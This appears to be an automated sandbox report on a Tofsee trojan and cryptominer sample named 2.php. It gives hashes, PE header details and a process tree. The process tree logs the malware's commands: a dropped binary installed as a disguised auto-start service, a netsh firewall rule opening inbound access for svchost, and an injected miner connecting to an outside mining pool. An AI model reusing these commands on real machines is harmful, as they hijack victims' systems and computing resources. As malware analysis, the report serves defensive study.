Program did not start
General Info
- File name
-
2.php
- Verdict
- Malicious activity
- Analysis date
- 6/12/2019, 22:20:53
- OS:
- Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
- Tags:
-
tofsee
trojan
miner
- Indicators:
- MIME:
- application/x-dosexec
- File info:
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
-
2654ff60cc92922a5f53131b424fdbb7
- SHA1
-
2552e23ba01ccbfa9f8cf5a8b4ef29b8173cfe0e
- SHA256
-
13fcfe6d20cae4881ba24f9ce10831f0f7ce25505c742f825b35fbe38aecb6ce
- SSDEEP
-
1536:JH8cdM+qlmhgBN/X2peYt/Cmivl81S2D2dlYGZgeu:JHXGmSBlXXYtaZvlmC3ye
Software environment set and analysis options
Launch configuration
- Task duration
- 660 seconds
- Additional time used
- none
- Fakenet option
- off
- Heavy Evaision option
- off
- MITM proxy
- off
- Route via Tor
- off
- Network geolocation
- off
- Privacy
- Public submission
- Autoconfirmation of UAC
- on
Software preset
- Internet Explorer 11.0.9600.18860
KB4052978
- Adobe Acrobat Reader DC MUI (15.007.20033)
- Adobe Flash Player 27 ActiveX (27.0.0.187)
- Adobe Flash Player 27 NPAPI (27.0.0.187)
- Adobe Flash Player 27 PPAPI (27.0.0.187)
- CCleaner (5.35)
- Google Chrome (73.0.3683.75)
- Google Update Helper (1.3.33.23)
- Java 8 Update 92 (64-bit) (8.0.920.14)
- Java Auto Updater (2.8.92.14)
- Microsoft .NET Framework 4.6.1 (4.6.01055)
- Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
- Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Professional 2010 (14.0.4763.1000)
- Microsoft Office Proof (English) 2010 (14.0.4763.1000)
- Microsoft Office Proof (French) 2010 (14.0.4763.1000)
- Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
- Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
- Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
- Microsoft Office Single Image 2010 (14.0.4763.1000)
- Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
- Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
- Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
- Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
- Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
- Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
- Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
- Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
- Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
- Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
- Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (14.12.25810.0)
- Microsoft Visual C++ 2017 Redistributable (x86) - 14.11.25325 (14.11.25325.0)
- Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810 (14.12.25810)
- Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810 (14.12.25810)
- Microsoft Visual C++ 2017 x86 Additional Runtime - 14.11.25325 (14.11.25325)
- Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.11.25325 (14.11.25325)
- Mozilla Firefox 65.0.2 (x64 en-US) (65.0.2)
- Mozilla Maintenance Service (65.0.2)
- Notepad++ (64-bit x64) (7.5.1)
- Opera 12.15 (12.15.1748)
- Skype™ 7.39 (7.39.102)
- VLC media player (2.2.6)
- WinRAR 5.60 (64-bit) (5.60.0)
Hotfixes
- Client LanguagePack Package
- Client Refresh LanguagePack Package
- CodecPack Basic Package
- Foundation Package
- IE Hyphenation Parent Package English
- IE Spelling Parent Package English
- IE Troubleshooters Package
- InternetExplorer Optional Package
- InternetExplorer Package TopLevel
- KB2479943
- KB2491683
- KB2506014
- KB2506212
- KB2506928
- KB2509553
- KB2532531
- KB2533552
- KB2534111
- KB2545698
- KB2547666
- KB2552343
- KB2560656
- KB2563227
- KB2564958
- KB2579686
- KB2585542
- KB2585542 SP1
- KB2598845
- KB2603229
- KB2604115
- KB2620704
- KB2621440
- KB2631813
- KB2640148
- KB2653956
- KB2654428
- KB2656356
- KB2656356 SP1
- KB2660075
- KB2667402
- KB2685811
- KB2685813
- KB2685939
- KB2690533
- KB2698365
- KB2705219
- KB2706045
- KB2719857
- KB2726535
- KB2727528
- KB2729094
- KB2729452
- KB2732059
- KB2732487
- KB2736422
- KB2742599
- KB2750841
- KB2758857
- KB2761217
- KB2763523
- KB2770660
- KB2773072
- KB2786081
- KB2789645
- KB2789645 SP1
- KB2791765
- KB2799926
- KB2800095
- KB2807986
- KB2808679
- KB2813430
- KB2834140
- KB2836942
- KB2836943
- KB2840631
- KB2843630
- KB2847927
- KB2852386
- KB2853952
- KB2861698
- KB2862152
- KB2862330
- KB2862335
- KB2864202
- KB2868038
- KB2871997
- KB2884256
- KB2888049
- KB2891804
- KB2892074
- KB2893294
- KB2893519
- KB2894844
- KB2900986
- KB2908783
- KB2911501
- KB2912390
- KB2918077
- KB2919469
- KB2931356
- KB2937610
- KB2943357
- KB2952664
- KB2966583
- KB2968294
- KB2970228
- KB2972100
- KB2972211
- KB2973112
- KB2973201
- KB2973351
- KB2977292
- KB2978120
- KB2978742
- KB2984972
- KB2985461
- KB2991963
- KB2992611
- KB3003743
- KB3004361
- KB3004375
- KB3006121
- KB3006137
- KB3010788
- KB3011780
- KB3013531
- KB3019978
- KB3020370
- KB3021674
- KB3021917
- KB3022777
- KB3023215
- KB3030377
- KB3031432
- KB3035126
- KB3035132
- KB3037574
- KB3042058
- KB3045685
- KB3046017
- KB3046269
- KB3054476
- KB3055642
- KB3059317
- KB3060716
- KB3067903
- KB3068708
- KB3071756
- KB3072305
- KB3074543
- KB3075220
- KB3076895
- KB3078601
- KB3078667
- KB3080149
- KB3084135
- KB3086255
- KB3092601
- KB3092627
- KB3093513
- KB3097989
- KB3101722
- KB3107998
- KB3108371
- KB3108381
- KB3108664
- KB3109103
- KB3109560
- KB3110329
- KB3115858
- KB3115858 SP1
- KB3122648
- KB3124275
- KB3126587
- KB3127220
- KB3133977
- KB3137061
- KB3138378
- KB3138612
- KB3138910
- KB3139398
- KB3139914
- KB3140245
- KB3147071
- KB3150220
- KB3155178
- KB3156016
- KB3156019
- KB3159398
- KB3161102
- KB3161949
- KB3161958
- KB3170735
- KB3170735 SP1
- KB3172605
- KB3177467
- KB3179573
- KB3184143
- KB4019990
- KB4040980
- KB976902
- KB982018
- LocalPack AU Package
- LocalPack CA Package
- LocalPack GB Package
- LocalPack US Package
- LocalPack ZA Package
- Package 1 for KB2656356
- Package 1 for KB2789645
- Package 1 for KB3115858
- Package 1 for KB3170735
- Package 2 for KB2585542
- Package 2 for KB2656356
- Package 2 for KB2789645
- Package 2 for KB3115858
- Package 2 for KB3170735
- Package 3 for KB2585542
- Package 3 for KB2656356
- Package 4 for KB2656356
- Package 4 for KB2789645
- Package 5 for KB2656356
- Package 7 for KB2656356
- PlatformUpdate Win7 SRV08R2 Package TopLevel
- ProfessionalEdition
- RollupFix
- UltimateEdition
- WUClient SelfUpdate ActiveX
- WUClient SelfUpdate Aux TopLevel
- WUClient SelfUpdate Core TopLevel
Behavior activities
| MALICIOUS | SUSPICIOUS | INFO |
|---|---|---|
Application was dropped or rewritten from another process
|
Creates files in the Windows directory
|
No info indicators. |
Static information
TRiD
.dll
|
Win32 Dynamic Link Library (generic) (38.3%)
.exe
|
Win32 Executable (generic) (26.2%)
.exe
|
Win16/32 Executable Delphi generic (12%)
.exe
|
Generic Win/DOS Executable (11.6%)
.exe
|
DOS Executable Generic (11.6%)
EXIF
EXE
MachineType:
Intel 386 or later, and compatibles
TimeStamp:
2014:03:07 19:46:41+01:00
PEType:
PE32
LinkerVersion:
5
CodeSize:
17408
InitializedDataSize:
81920
UninitializedDataSize:
null
EntryPoint:
0x1004
OSVersion:
5.1
ImageVersion:
null
SubsystemVersion:
5.1
Subsystem:
Windows GUI
Summary
Architecture:
IMAGE_FILE_MACHINE_I386
Subsystem:
IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:
07-Mar-2014 18:46:41
DOS Header
Magic number:
MZ
Bytes on last page of file:
0x0090
Pages in file:
0x0003
Relocations:
0x0000
Size of header:
0x0004
Min extra paragraphs:
0x0000
Max extra paragraphs:
0xFFFF
Initial SS value:
0x0000
Initial SP value:
0x00B8
Checksum:
0x0000
Initial IP value:
0x0000
Initial CS value:
0x0000
Overlay number:
0x0000
OEM identifier:
0x0000
OEM information:
0x0000
Address of NE header:
0x00000080
PE Headers
Signature:
PE
Machine:
IMAGE_FILE_MACHINE_I386
Number of sections:
5
Time date stamp:
07-Mar-2014 18:46:41
Pointer to Symbol Table:
0x00000000
Number of symbols:
0
Size of Optional Header:
0x00E0
Characteristics
IMAGE_FILE_32BIT_MACHINE
IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_RELOCS_STRIPPED
Sections
| Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
|---|---|---|---|---|---|
| .text | 0x00001000 | 0x0000438F | 0x00004400 | IMAGE_SCN_MEM_EXECUTE,IMAGE_SCN_MEM_READ | 4.57529 |
| .pdata | 0x00006000 | 0x000129B0 | 0x00012A00 | IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE | 7.98225 |
| .fdata | 0x00019000 | 0x0000059F | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_MEM_READ,IMAGE_SCN_MEM_WRITE | 0.636004 |
| .rsrc | 0x0001A000 | 0x00000460 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA,IMAGE_SCN_CNT_UNINITIALIZED_DATA,IMAGE_SCN_MEM_WRITE | 0.100707 |
| .relos | 0x0001B000 | 0x00000960 | 0x00000A00 | IMAGE_SCN_MEM_DISCARDABLE,IMAGE_SCN_MEM_READ | 6.62734 |
Resources
1
Imports
msimg32.dll
clbcatq.dll
kernel32.dll
Exports
No exports.
Video and screenshots
Processes
Total processes
54
Monitored processes
12
Malicious processes
4
Suspicious processes
0
Behavior graph
–
+
Specs description
Integrity level
elevation
Task сontains an error
or was rebooted
Process has crashed
Task contains several
apps running
Executable file was
dropped
Debug information is
available
Process was injected
Network attacks were
detected
Application downloaded
the executable file
Actions similar to
stealing personal data
Behavior similar to
exploiting the vulnerability
Inspected object has
sucpicious PE structure
File is detected by
antivirus software
CPU overrun
RAM overrun
Process starts the
services
Process was added to
the startup
Behavior similar to
spam
Low-level access to
the HDD
Probably Tor was used
System was rebooted
Connects to the
network
Known threat
Process information
Click at the process to see the details.
- PID
- 1112
- CMD
- "C:\Users\admin\AppData\Local\Temp\2.php.exe"
- Path
- C:\Users\admin\AppData\Local\Temp\2.php.exe
- Indicators
- Parent process
- ––
- User
- admin
- Integrity Level
- MEDIUM
- Exit code
- 0
- Version:
- Company
- Description
- Version
Modules
| Image |
|---|
| c:\users\admin\appdata\local\temp\2.php.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\systemroot\syswow64\ntdll.dll |
| c:\windows\system32\wow64.dll |
| c:\windows\system32\wow64win.dll |
| c:\windows\system32\wow64cpu.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\syswow64\kernel32.dll |
| c:\windows\system32\user32.dll |
| c:\windows\syswow64\kernelbase.dll |
| c:\windows\syswow64\msimg32.dll |
| c:\windows\syswow64\gdi32.dll |
| c:\windows\syswow64\user32.dll |
| c:\windows\syswow64\advapi32.dll |
| c:\windows\syswow64\msvcrt.dll |
| c:\windows\syswow64\sechost.dll |
| c:\windows\syswow64\rpcrt4.dll |
| c:\windows\syswow64\sspicli.dll |
| c:\windows\syswow64\cryptbase.dll |
| c:\windows\syswow64\lpk.dll |
| c:\windows\syswow64\usp10.dll |
| c:\windows\syswow64\clbcatq.dll |
| c:\windows\syswow64\ole32.dll |
| c:\windows\syswow64\oleaut32.dll |
| c:\windows\syswow64\imm32.dll |
| c:\windows\syswow64\msctf.dll |
| c:\windows\syswow64\eappcfg.dll |
| c:\windows\syswow64\ws2_32.dll |
| c:\windows\syswow64\nsi.dll |
| c:\windows\syswow64\dbghelp.dll |
| c:\windows\syswow64\shell32.dll |
| c:\windows\syswow64\shlwapi.dll |
| c:\windows\syswow64\propsys.dll |
| c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll |
| c:\windows\syswow64\apphelp.dll |
| c:\windows\syswow64\ieframe.dll |
| c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll |
| c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll |
| c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll |
| c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll |
| c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll |
| c:\windows\syswow64\version.dll |
| c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll |
| c:\windows\syswow64\normaliz.dll |
| c:\windows\syswow64\iertutil.dll |
| c:\windows\syswow64\setupapi.dll |
| c:\windows\syswow64\cfgmgr32.dll |
| c:\windows\syswow64\devobj.dll |
| c:\windows\syswow64\ntmarta.dll |
| c:\windows\syswow64\wldap32.dll |
| c:\windows\syswow64\profapi.dll |
| c:\windows\syswow64\urlmon.dll |
| c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll |
| c:\windows\syswow64\wininet.dll |
| c:\windows\syswow64\userenv.dll |
| c:\windows\syswow64\secur32.dll |
| c:\windows\syswow64\wusa.exe |
| c:\windows\syswow64\mpr.dll |
- PID
- 2540
- CMD
- "C:\Windows\System32\wusa.exe"
- Path
- C:\Windows\SysWOW64\wusa.exe
- Indicators
- No indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- MEDIUM
- Exit code
- 3221226540
- Version:
- Company
- Microsoft Corporation
- Description
- Windows Update Standalone Installer
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
- PID
- 1668
- CMD
- "C:\Windows\SysWOW64\wusa.exe"
- Path
- C:\Windows\SysWOW64\wusa.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- Windows Update Standalone Installer
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
| Image |
|---|
| c:\windows\syswow64\wusa.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\systemroot\syswow64\ntdll.dll |
| c:\windows\system32\wow64.dll |
| c:\windows\system32\wow64win.dll |
| c:\windows\system32\wow64cpu.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\syswow64\kernel32.dll |
| c:\windows\system32\user32.dll |
| c:\windows\syswow64\kernelbase.dll |
| c:\windows\syswow64\advapi32.dll |
| c:\windows\syswow64\msvcrt.dll |
| c:\windows\syswow64\sechost.dll |
| c:\windows\syswow64\rpcrt4.dll |
| c:\windows\syswow64\sspicli.dll |
| c:\windows\syswow64\cryptbase.dll |
| c:\windows\syswow64\gdi32.dll |
| c:\windows\syswow64\user32.dll |
| c:\windows\syswow64\lpk.dll |
| c:\windows\syswow64\usp10.dll |
| c:\windows\syswow64\ole32.dll |
| c:\windows\syswow64\oleaut32.dll |
| c:\windows\syswow64\shell32.dll |
| c:\windows\syswow64\shlwapi.dll |
| c:\windows\syswow64\dpx.dll |
| c:\windows\syswow64\wtsapi32.dll |
| c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll |
| c:\windows\syswow64\imm32.dll |
| c:\windows\syswow64\msctf.dll |
| c:\windows\syswow64\uxtheme.dll |
| c:\windows\syswow64\clbcatq.dll |
- PID
- 308
- CMD
- cmd /C mkdir C:\Windows\SysWOW64\qufzwyvo\
- Path
- C:\Windows\system32\cmd.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- Windows Command Processor
- Version
- 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
| Image |
|---|
| c:\windows\system32\cmd.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\system32\kernelbase.dll |
| c:\windows\system32\msvcrt.dll |
| c:\windows\system32\winbrand.dll |
| c:\windows\system32\user32.dll |
| c:\windows\system32\gdi32.dll |
| c:\windows\system32\lpk.dll |
| c:\windows\system32\usp10.dll |
| c:\windows\system32\imm32.dll |
| c:\windows\system32\msctf.dll |
- PID
- 2248
- CMD
- cmd /C move /Y "C:\Users\admin\AppData\Local\Temp\irjirdhy.exe" C:\Windows\SysWOW64\qufzwyvo\
- Path
- C:\Windows\system32\cmd.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- Windows Command Processor
- Version
- 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
| Image |
|---|
| c:\windows\system32\cmd.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\system32\kernelbase.dll |
| c:\windows\system32\msvcrt.dll |
| c:\windows\system32\winbrand.dll |
| c:\windows\system32\user32.dll |
| c:\windows\system32\gdi32.dll |
| c:\windows\system32\lpk.dll |
| c:\windows\system32\usp10.dll |
| c:\windows\system32\imm32.dll |
| c:\windows\system32\msctf.dll |
- PID
- 2852
- CMD
- sc create qufzwyvo binPath= "C:\Windows\SysWOW64\qufzwyvo\irjirdhy.exe /d\"C:\Users\admin\AppData\Local\Temp\2.php.exe\"" type= own start= auto DisplayName= "wifi support"
- Path
- C:\Windows\system32\sc.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- A tool to aid in developing services for WindowsNT
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
- PID
- 2508
- CMD
- sc description qufzwyvo "wifi internet conection"
- Path
- C:\Windows\system32\sc.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- A tool to aid in developing services for WindowsNT
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
- PID
- 2816
- CMD
- sc start qufzwyvo
- Path
- C:\Windows\system32\sc.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 0
- Version:
- Company
- Microsoft Corporation
- Description
- A tool to aid in developing services for WindowsNT
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
- PID
- 2616
- CMD
- C:\Windows\SysWOW64\qufzwyvo\irjirdhy.exe /d"C:\Users\admin\AppData\Local\Temp\2.php.exe"
- Path
- C:\Windows\SysWOW64\qufzwyvo\irjirdhy.exe
- Indicators
- No indicators
- Parent process
- ––
- User
- SYSTEM
- Integrity Level
- SYSTEM
- Exit code
- 0
- Version:
- Company
- Description
- Version
Modules
| Image |
|---|
| c:\windows\syswow64\qufzwyvo\irjirdhy.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\systemroot\syswow64\ntdll.dll |
| c:\windows\system32\wow64.dll |
| c:\windows\system32\wow64win.dll |
| c:\windows\system32\wow64cpu.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\syswow64\kernel32.dll |
| c:\windows\system32\user32.dll |
| c:\windows\syswow64\kernelbase.dll |
| c:\windows\syswow64\msimg32.dll |
| c:\windows\syswow64\gdi32.dll |
| c:\windows\syswow64\user32.dll |
| c:\windows\syswow64\advapi32.dll |
| c:\windows\syswow64\msvcrt.dll |
| c:\windows\syswow64\sechost.dll |
| c:\windows\syswow64\rpcrt4.dll |
| c:\windows\syswow64\sspicli.dll |
| c:\windows\syswow64\cryptbase.dll |
| c:\windows\syswow64\lpk.dll |
| c:\windows\syswow64\usp10.dll |
| c:\windows\syswow64\clbcatq.dll |
| c:\windows\syswow64\ole32.dll |
| c:\windows\syswow64\oleaut32.dll |
| c:\windows\syswow64\imm32.dll |
| c:\windows\syswow64\msctf.dll |
| c:\windows\syswow64\eappcfg.dll |
| c:\windows\syswow64\ws2_32.dll |
| c:\windows\syswow64\nsi.dll |
| c:\windows\syswow64\dbghelp.dll |
| c:\windows\syswow64\shell32.dll |
| c:\windows\syswow64\shlwapi.dll |
| c:\windows\syswow64\apphelp.dll |
| c:\windows\syswow64\svchost.exe |
- PID
- 2580
- CMD
- svchost.exe
- Path
- C:\Windows\SysWOW64\svchost.exe
- Indicators
- Parent process
- irjirdhy.exe
- User
- SYSTEM
- Integrity Level
- SYSTEM
- Version:
- Company
- Microsoft Corporation
- Description
- Host Process for Windows Services
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
| Image |
|---|
| c:\windows\syswow64\svchost.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\systemroot\syswow64\ntdll.dll |
| c:\windows\system32\wow64.dll |
| c:\windows\system32\wow64win.dll |
| c:\windows\system32\wow64cpu.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\syswow64\kernel32.dll |
| c:\windows\system32\user32.dll |
| c:\windows\syswow64\kernelbase.dll |
| c:\windows\syswow64\ws2_32.dll |
| c:\windows\syswow64\msvcrt.dll |
| c:\windows\syswow64\rpcrt4.dll |
| c:\windows\syswow64\sspicli.dll |
| c:\windows\syswow64\cryptbase.dll |
| c:\windows\syswow64\sechost.dll |
| c:\windows\syswow64\nsi.dll |
| c:\windows\syswow64\dbghelp.dll |
| c:\windows\syswow64\user32.dll |
| c:\windows\syswow64\gdi32.dll |
| c:\windows\syswow64\lpk.dll |
| c:\windows\syswow64\usp10.dll |
| c:\windows\syswow64\advapi32.dll |
| c:\windows\syswow64\shell32.dll |
| c:\windows\syswow64\shlwapi.dll |
| c:\windows\syswow64\oleaut32.dll |
| c:\windows\syswow64\ole32.dll |
| c:\windows\syswow64\imm32.dll |
| c:\windows\syswow64\msctf.dll |
| c:\windows\syswow64\iphlpapi.dll |
| c:\windows\syswow64\winnsi.dll |
| c:\windows\syswow64\dhcpcsvc.dll |
| c:\windows\syswow64\dhcpcsvc6.dll |
| c:\windows\syswow64\nlaapi.dll |
| c:\windows\syswow64\napinsp.dll |
| c:\windows\syswow64\pnrpnsp.dll |
| c:\windows\syswow64\mswsock.dll |
| c:\windows\syswow64\dnsapi.dll |
| c:\windows\syswow64\winrnr.dll |
| c:\windows\syswow64\fwpuclnt.dll |
| c:\windows\syswow64\rasadhlp.dll |
| c:\windows\syswow64\wshtcpip.dll |
| c:\windows\syswow64\wsock32.dll |
| c:\windows\syswow64\crypt32.dll |
| c:\windows\syswow64\msasn1.dll |
| c:\windows\syswow64\clbcatq.dll |
| c:\windows\syswow64\secur32.dll |
| c:\windows\syswow64\upnp.dll |
| c:\windows\syswow64\winhttp.dll |
| c:\windows\syswow64\webio.dll |
| c:\windows\syswow64\ssdpapi.dll |
| c:\windows\syswow64\userenv.dll |
| c:\windows\syswow64\profapi.dll |
| c:\windows\syswow64\cryptsp.dll |
| c:\windows\syswow64\credssp.dll |
| c:\windows\syswow64\schannel.dll |
| c:\windows\syswow64\rsaenh.dll |
| c:\windows\syswow64\rpcrtremote.dll |
| c:\windows\syswow64\psapi.dll |
| c:\windows\syswow64\apphelp.dll |
- PID
- 2748
- CMD
- netsh advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
- Path
- C:\Windows\system32\netsh.exe
- Indicators
- Parent process
- 2.php.exe
- User
- admin
- Integrity Level
- HIGH
- Exit code
- 1
- Version:
- Company
- Microsoft Corporation
- Description
- Network Command Shell
- Version
- 6.1.7600.16385 (win7_rtm.090713-1255)
Modules
| Image |
|---|
| c:\windows\system32\netsh.exe |
| c:\systemroot\system32\ntdll.dll |
| c:\windows\system32\kernel32.dll |
| c:\windows\system32\kernelbase.dll |
| c:\windows\system32\advapi32.dll |
| c:\windows\system32\msvcrt.dll |
| c:\windows\system32\sechost.dll |
| c:\windows\system32\rpcrt4.dll |
| c:\windows\system32\credui.dll |
| c:\windows\system32\user32.dll |
| c:\windows\system32\gdi32.dll |
| c:\windows\system32\lpk.dll |
| c:\windows\system32\usp10.dll |
| c:\windows\system32\mpr.dll |
| c:\windows\system32\ole32.dll |
| c:\windows\system32\oleaut32.dll |
| c:\windows\system32\imm32.dll |
| c:\windows\system32\msctf.dll |
| c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll |
| c:\windows\system32\shlwapi.dll |
| c:\windows\system32\rasmontr.dll |
| c:\windows\system32\mprapi.dll |
| c:\windows\system32\rasapi32.dll |
| c:\windows\system32\rasman.dll |
| c:\windows\system32\ws2_32.dll |
| c:\windows\system32\nsi.dll |
| c:\windows\system32\fwpuclnt.dll |
| c:\windows\system32\mfc42u.dll |
| c:\windows\system32\odbc32.dll |
| c:\windows\system32\iphlpapi.dll |
| c:\windows\system32\winnsi.dll |
| c:\windows\system32\odbcint.dll |
| c:\windows\system32\nshwfp.dll |
| c:\windows\system32\crypt32.dll |
| c:\windows\system32\msasn1.dll |
| c:\windows\system32\slc.dll |
| c:\windows\system32\dhcpcmonitor.dll |
| c:\windows\system32\dhcpcsvc.dll |
| c:\windows\system32\dhcpcsvc6.dll |
| c:\windows\system32\dhcpqec.dll |
| c:\windows\system32\qutil.dll |
| c:\windows\system32\wevtapi.dll |
| c:\windows\system32\wshelper.dll |
| c:\windows\system32\ws2help.dll |
| c:\windows\system32\mswsock.dll |
| c:\windows\system32\nshhttp.dll |
| c:\windows\system32\httpapi.dll |
| c:\windows\system32\fwcfg.dll |
| c:\windows\system32\firewallapi.dll |
| c:\windows\system32\version.dll |
| c:\windows\system32\authfwcfg.dll |
| c:\windows\system32\bcrypt.dll |
| c:\windows\system32\winipsec.dll |
| c:\windows\system32\ifmon.dll |
| c:\windows\system32\setupapi.dll |
| c:\windows\system32\cfgmgr32.dll |
| c:\windows\system32\devobj.dll |
| c:\windows\system32\nci.dll |
| c:\windows\system32\devrtl.dll |
| c:\windows\system32\netiohlp.dll |
| c:\windows\system32\dnsapi.dll |
| c:\windows\system32\whhelper.dll |
| c:\windows\system32\winhttp.dll |
| c:\windows\system32\webio.dll |
| c:\windows\system32\eapqec.dll |
| c:\windows\system32\tsgqec.dll |
| c:\windows\system32\napipsec.dll |
| c:\windows\system32\rsaenh.dll |
| c:\windows\system32\rpcrtremote.dll |
| c:\windows\system32\gpapi.dll |
| c:\windows\system32\bcryptprimitives.dll |
| c:\windows\system32\qagent.dll |
| c:\windows\system32\clbcatq.dll |
| c:\windows\system32\cryptsp.dll |
| c:\windows\system32\cryptbase.dll |
| c:\windows\system32\peerdistsh.dll |
| c:\windows\system32\wlanhlp.dll |
| c:\windows\system32\wlancfg.dll |
| c:\windows\system32\wwapi.dll |
| c:\windows\system32\wwancfg.dll |
| c:\windows\system32\p2pcollab.dll |
| c:\windows\system32\p2p.dll |
| c:\windows\system32\p2pnetsh.dll |
| c:\windows\system32\wlanutil.dll |
| c:\windows\system32\wlanapi.dll |
| c:\windows\system32\wcnnetsh.dll |
| c:\windows\system32\tdh.dll |
| c:\windows\system32\sspicli.dll |
| c:\windows\system32\secur32.dll |
| c:\windows\system32\wdi.dll |
| c:\windows\system32\ndfapi.dll |
| c:\windows\system32\nettrace.dll |
| c:\windows\system32\polstore.dll |
| c:\windows\system32\adsldpc.dll |
| c:\windows\system32\activeds.dll |
| c:\windows\system32\profapi.dll |
| c:\windows\system32\userenv.dll |
| c:\windows\system32\logoncli.dll |
| c:\windows\system32\wkscli.dll |
| c:\windows\system32\srvcli.dll |
| c:\windows\system32\netutils.dll |
| c:\windows\system32\netapi32.dll |
| c:\windows\system32\nshipsec.dll |
| c:\windows\system32\wldap32.dll |
| c:\windows\system32\certcli.dll |
| c:\windows\system32\napmontr.dll |
| c:\windows\system32\eappprxy.dll |
| c:\windows\system32\onex.dll |
| c:\windows\system32\eappcfg.dll |
| c:\windows\system32\atl.dll |
| c:\windows\system32\dot3api.dll |
| c:\windows\system32\hnetmon.dll |
| c:\windows\system32\netshell.dll |
| c:\windows\system32\shell32.dll |
| c:\windows\system32\nlaapi.dll |
| c:\windows\system32\rpcnsh.dll |
| c:\windows\system32\dot3cfg.dll |
- PID
- 2528
- CMD
- svchost.exe -a cryptonight-heavy --variant tube -o stratum+tcp://185.181.165.20:8087 -u 1 -p x --nicehash --safe
- Path
- C:\Windows\SysWOW64\svchost.exe
- Indicators
- Parent process
- svchost.exe
- User
- SYSTEM
- Integrity Level
- SYSTEM
- Version:
- Company
- Microsoft Corporation
- Description
